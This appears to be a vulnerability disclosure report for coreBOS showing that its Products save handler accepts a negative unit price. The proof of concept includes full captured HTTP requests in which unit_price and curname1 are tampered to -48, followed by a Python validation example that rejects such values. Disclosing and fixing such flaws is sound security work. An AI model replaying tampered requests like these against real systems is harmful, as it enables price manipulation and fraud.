Business Logic Errors in tsolucio/corebos
Valid
Reported on Dec 12th 2021
Description
The application is vulnerable to a business logic error: the Products save handler accepts a negative unit price. The value submitted for the Unit Price field is not validated server-side, so an authenticated user who edits the save request in a proxy can store a product with a negative price.
Proof of Concept
Step 1: Log in to the application at https://demo.corebos.com/index.php?action=Login&module=Users
Step 2: Navigate to Inventory -> Products -> Edit any product.
Step 3: Enter an amount in the Unit Price field and click Save, then intercept the request in a proxy and change the unit_price value (and the matching per-currency price field curname1) to a negative number.
Original Request
```
POST /index.php HTTP/2
Host: demo.corebos.com
Cookie: democoreboscom=d3461f830c87c056a1a443f68e5a6350; ck_login_id_vtiger=1; timezone=0; corebos_browsertabID=868287147944918; ckCsrfToken=23swKt10CYryuff2VHVHjRn0LClD4DshAF6wcDZs
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------205858748014217242463640623601
Content-Length: 8781
Referer: https://demo.corebos.com/index.php?module=Products&action=EditView&record=2616&return_module=Products&return_action=index&return_viewname=24
Origin: https://demo.corebos.com
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Te: trailers
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="__vt5rftk"
sid:e8fd5f35548bf20913d4768e75a115978d4be68a,1639332378
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="MAX_FILE_SIZE"
3000000
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="activity_mode"
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="pagenumber"
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="module"
Products
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="record"
2616
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="mode"
edit
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="action"
Save
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="saverepeat"
0
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="return_module"
Products
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="return_id"
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="return_action"
index
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="return_viewname"
24
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="createmode"
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="cbcustominfo1"
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="cbcustominfo2"
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="Module_Popup_Edit"
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="Module_Popup_Save"
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="Module_Popup_Save_Param"
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="FILTERFIELDSMAP"
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="search_url"
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="productname"
K101high Pressure Japanese Stainless Steel Berring Tubo Tornado Gun
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="product_no"
PRO1
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="discontinued"
on
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="productcode"
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="productcategory"
Hardware
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="manufacturer"
LexPon Inc.
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="sales_start_date"
2014-03-04
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="start_date"
2013-05-07
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="sales_end_date"
2025-07-13
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="expiry_date"
2025-04-27
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="vendor_id_type"
Vendors
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="vendor_id"
2419
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="vendor_id_display"
John Drew Theater Of Gld Hall
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="website"
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="vendor_part_no"
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="mfr_part_no"
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="productsheet"
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="serial_no"
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="glacct"
300-Sales-Software
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="cf_1184"
red, black,green
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="test1_relation_type"
test1
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="test1_relation"
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="test1_relation_display"
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="unit_price"
48
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="base_currency"
curname1
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="base_conversion_rate"
curname1
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="cur_1_check"
on
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="curname1"
48
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="base_currency_input"
curname1
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="commissionrate"
0,00
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="tax1"
4.500
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="tax2"
10.000
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="tax3"
12.500
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="cost_price"
0,00
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="usageunit"
Sheet
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="qty_per_unit"
0.00
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="qtyinstock"
72.000
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="reorderlevel"
0
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="assigntype"
U
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="assigned_user_id"
6
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="assigned_group_id"
3
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="qtyindemand"
380
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="cf_1185"
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="del_file_list"
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="file_0"; filename=""
Content-Type: application/octet-stream
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="description"
Quis non odit sordidos, vanos, leves, futtiles? Dicet pro me ipsa virtus nec dubitabit isti vestro beato M. Stuprata per vim Lucretia a regis filio testata civis se ipsa interemit. Ea possunt paria non esse. Ut id aliis narrare gestiant? Duo Reges: constructio interrete. Idem fecisset Epicurus, si sententiam hanc, quae nunc Hieronymi est, coniunxisset cum Aristippi vetere sententia. Frater et T.
-----------------------------205858748014217242463640623601--
```
Edited Request
```
POST /index.php HTTP/2
Host: demo.corebos.com
Cookie: democoreboscom=d3461f830c87c056a1a443f68e5a6350; ck_login_id_vtiger=1; timezone=0; corebos_browsertabID=868287147944918; ckCsrfToken=23swKt10CYryuff2VHVHjRn0LClD4DshAF6wcDZs
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------205858748014217242463640623601
Content-Length: 8781
Referer: https://demo.corebos.com/index.php?module=Products&action=EditView&record=2616&return_module=Products&return_action=index&return_viewname=24
Origin: https://demo.corebos.com
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Te: trailers
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="__vt5rftk"
sid:e8fd5f35548bf20913d4768e75a115978d4be68a,1639332378
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="MAX_FILE_SIZE"
3000000
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="activity_mode"
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="pagenumber"
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="module"
Products
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="record"
2616
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="mode"
edit
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="action"
Save
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="saverepeat"
0
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="return_module"
Products
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="return_id"
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="return_action"
index
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="return_viewname"
24
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="createmode"
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="cbcustominfo1"
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="cbcustominfo2"
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="Module_Popup_Edit"
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="Module_Popup_Save"
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="Module_Popup_Save_Param"
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="FILTERFIELDSMAP"
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="search_url"
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="productname"
K101high Pressure Japanese Stainless Steel Berring Tubo Tornado Gun
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="product_no"
PRO1
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="discontinued"
on
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="productcode"
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="productcategory"
Hardware
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="manufacturer"
LexPon Inc.
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="sales_start_date"
2014-03-04
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="start_date"
2013-05-07
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="sales_end_date"
2025-07-13
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="expiry_date"
2025-04-27
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="vendor_id_type"
Vendors
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="vendor_id"
2419
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="vendor_id_display"
John Drew Theater Of Gld Hall
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="website"
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="vendor_part_no"
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="mfr_part_no"
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="productsheet"
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="serial_no"
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="glacct"
300-Sales-Software
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="cf_1184"
red, black,green
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="test1_relation_type"
test1
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="test1_relation"
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="test1_relation_display"
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="unit_price"
-48
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="base_currency"
curname1
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="base_conversion_rate"
curname1
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="cur_1_check"
on
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="curname1"
-48
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="base_currency_input"
curname1
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="commissionrate"
0,00
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="tax1"
4.500
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="tax2"
10.000
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="tax3"
12.500
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="cost_price"
0,00
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="usageunit"
Sheet
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="qty_per_unit"
0.00
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="qtyinstock"
72.000
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="reorderlevel"
0
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="assigntype"
U
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="assigned_user_id"
6
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="assigned_group_id"
3
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="qtyindemand"
380
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="cf_1185"
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="del_file_list"
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="file_0"; filename=""
Content-Type: application/octet-stream
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="description"
Quis non odit sordidos, vanos, leves, futtiles? Dicet pro me ipsa virtus nec dubitabit isti vestro beato M. Stuprata per vim Lucretia a regis filio testata civis se ipsa interemit. Ea possunt paria non esse. Ut id aliis narrare gestiant? Duo Reges: constructio interrete. Idem fecisset Epicurus, si sententiam hanc, quae nunc Hieronymi est, coniunxisset cum Aristippi vetere sententia. Frater et T.
-----------------------------205858748014217242463640623601--
```
Step 4: Forward the edited request. The server saves the product with the negative unit price (-48 in the request above) and returns no validation error.
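The check the report shows is missing, as an added example (Python; not code from the report or from coreBOS, whose save handler is PHP): it parses a multipart/form-data body shaped like the captured Products save request and rejects any price or quantity field that is negative or not numeric, normalising the comma decimal separator seen in the capture (0,00). The boundary and field names are taken from the captured request; the trimmed form bodies, the function names and the assumption that values carry no thousands separator are constructed for this example.

```python
"""Added example (not code from the huntr report or from coreBOS):
parse a multipart/form-data body shaped like the captured Products save
request, then apply the server-side check the report shows is missing,
namely that price and quantity fields must be non-negative numbers.

Field names and sample values come from the captured request; the
trimmed bodies and helper names are constructed for this example.
"""
import re
from decimal import Decimal, InvalidOperation

# Boundary taken from the captured Content-Type header
BOUNDARY = "---------------------------205858748014217242463640623601"

# Numeric fields of the Products form that must never be stored negative
NON_NEGATIVE_FIELDS = (
    "unit_price", "curname1", "cost_price", "commissionrate",
    "tax1", "tax2", "tax3", "qty_per_unit", "qtyinstock",
    "reorderlevel", "qtyindemand",
)

# Constructed subset of the two captured requests (text fields only)
ORIGINAL = {
    "module": "Products", "record": "2616", "action": "Save",
    "productcode": "", "unit_price": "48", "curname1": "48",
    "cost_price": "0,00", "tax1": "4.500", "qtyinstock": "72.000",
}
EDITED = dict(ORIGINAL, unit_price="-48", curname1="-48")


def build_body(values: dict, boundary: str = BOUNDARY) -> str:
    """Serialise name -> value pairs as a multipart/form-data body."""
    parts = [
        f'--{boundary}\r\nContent-Disposition: form-data; name="{name}"\r\n\r\n{value}\r\n'
        for name, value in values.items()
    ]
    return "".join(parts) + f"--{boundary}--\r\n"


def parse_multipart(body: str, boundary: str) -> dict:
    """Return name -> value for the text fields of a multipart/form-data body."""
    fields = {}
    for part in body.split("--" + boundary):
        part = part.strip("\r\n")
        if part in ("", "--"):          # preamble or closing delimiter
            continue
        headers, _, value = part.partition("\r\n\r\n")
        # '[; ]name=' avoids matching the 'filename=' of a file part
        match = re.search(r'[; ]name="([^"]*)"', headers)
        if match:
            fields[match.group(1)] = value
    return fields


def parse_amount(raw: str) -> Decimal:
    """Normalise '0,00' (comma decimal, as in the capture) or '4.500' to a Decimal.

    Assumes no thousands separators, which matches the captured request."""
    try:
        return Decimal(raw.strip().replace(",", "."))
    except InvalidOperation:
        raise ValueError(f"not a number: {raw!r}") from None


def validate_product(fields: dict) -> list:
    """Return validation errors; an empty list means the save may proceed."""
    errors = []
    for name in NON_NEGATIVE_FIELDS:
        raw = fields.get(name, "")
        if raw == "":                     # blank optional field is allowed
            continue
        try:
            amount = parse_amount(raw)
        except ValueError as exc:
            errors.append(f"{name}: {exc}")
            continue
        if amount < 0:
            errors.append(f"{name}: negative value {raw!r} rejected")
    return errors


def check_request(body: str, boundary: str = BOUNDARY) -> list:
    """Parse a request body and validate it the way the server should."""
    return validate_product(parse_multipart(body, boundary))


if __name__ == "__main__":
    for label, values in (("original", ORIGINAL), ("edited", EDITED)):
        errors = check_request(build_body(values))
        print(f"{label}: {'accepted' if not errors else errors}")
```

Running the block validates both bodies: the original passes and the edited one is rejected on both unit_price and curname1. Both fields need the check, since the edited request changes both; validating only the Unit Price field would leave the per-currency price open to the same edit.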
We are processing your report and will contact the tsolucio/corebos team within 24 hours. (2 years ago)
We have contacted a member of the tsolucio/corebos team and are waiting to hear back. (2 years ago)
Devendra Bhatla modified the report. (2 years ago)
We have sent a follow-up to the tsolucio/corebos team. We will try again in 7 days. (2 years ago)
Devendra Bhatla modified the report. (2 years ago)